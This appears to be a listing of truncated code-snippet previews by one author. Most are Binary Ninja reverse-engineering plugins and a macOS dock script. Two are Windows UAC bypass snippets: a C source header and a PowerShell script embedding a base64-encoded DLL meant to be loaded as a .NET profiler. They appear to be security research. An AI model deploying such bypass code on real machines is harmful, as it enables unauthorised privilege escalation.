joshwatson

// compile command:
// xcrun clang -o dock_monitor dock_monitor.m -fobjc-arc -isysroot $(xcrun --show-sdk-path) -framework Foundation -framework AppKit -Wall -Wshadow -Wextra
#import <Foundation/Foundation.h>
#import <AppKit/AppKit.h>

void changeDockPosition(CGDirectDisplayID displayID, NSString *position)
{
    // Retrieve the defaults dictionary and change the orientation key to
    // the new position
    NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults];

joshwatson

// Original source link https://twitter.com/hFireF0X/status/887930221466443776
// If you are here from any other link - do know that they just steal original info without giving any credit to source
// This bug has been fixed in 16273 public build.
#include "global.h"

HINSTANCE  g_hInstance;
HANDLE     g_ConOut = NULL;
BOOL       g_ConsoleOutput = FALSE;
WCHAR      g_BE = 0xFEFF;

joshwatson

# Bypass UAC with a .NET profiler DLL

# GUID, path and content
$GUID = '{' + [guid]::NewGuid() + '}'
$DllPath = $env:TEMP + "\test.dll"
$DllBytes64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADXHurFk3+ElpN/hJaTf4SWsR+Fl5B/hJaTf4WWkX+EligejJeRf4SWKB6Gl5J/hJZSaWNok3+ElgAAAAAAAAAAUEUAAGSGAwAgMyBZAAAAAAAAAADwACIgCwIOCgACAAAABgAAAAAAAAAQAAAAEAAAAAAAgAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAQAAAAAQAAAAAAAACAGABAAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA4CEAACgAAAAAAAAAAAAAAAAwAAAMAAAAAAAAAAAAAAAAAAAAAAAAACAgAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAA7AAAAABAAAAACAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAARgIAAAAgAAAABAAAAAYAAAAAAAAAAAAAAAAAAEAAAEAucGRhdGEAAAwAAAAAMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

joshwatson

from binaryninja import HighlightStandardColor, PluginCommand


def do_backward_slice(instruction, function):
    # switch to SSA form (this does nothing if it's already SSA).
    instruction_queue = set([instruction.ssa_form.instr_index])
    visited_instructions = set()

    variables = set()

joshwatson

class BNILExprVisitor(object):
    '''A class to faciliate visiting BNIL instructions.

    The following example outputs all addition expressions that are assigned
    to an MLIL variable.

    >>> visit = BNILExprVisitor()
    >>> @visit.add(MediumLevelILOperation.MLIL_SET_VAR)
    ... def visit_set_var(expr)
    ...     visit(expr.src)

joshwatson

import struct
import threading

import binaryninja as bn


class Graph(object):
    def __init__(self, view):
        # type: (Graph, bn.BinaryView) -> None
        self.view = view

joshwatson

import struct

from binaryninja import *

def find_vtable(bv, function_il):
    for bb in function_il:
        for il in bb:
            # vtable is referenced directly
            if (il.operation == LLIL_STORE and
                il.dest.operation == LLIL_REG and

joshwatson

from __future__ import print_function

from argparse import ArgumentParser
import sys

def decode_binary(input_file, output_file):
    next_addr = 0

    for line in input_file:
        addr,data = line.split(':')[:2]

joshwatson

import struct
import traceback
from binaryninja import (
    BinaryView, Architecture,
    SegmentReadable, SegmentExecutable, SegmentWritable
)

class MicrocorruptionView(BinaryView):
    name = "Microcorruption"
    long_name = "Microcorruption Memory Dump"

joshwatson

'''
bookmarks.py - Create/List bookmarks in Binary Ninja

Copyright (c) 2016 Josh Watson

Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the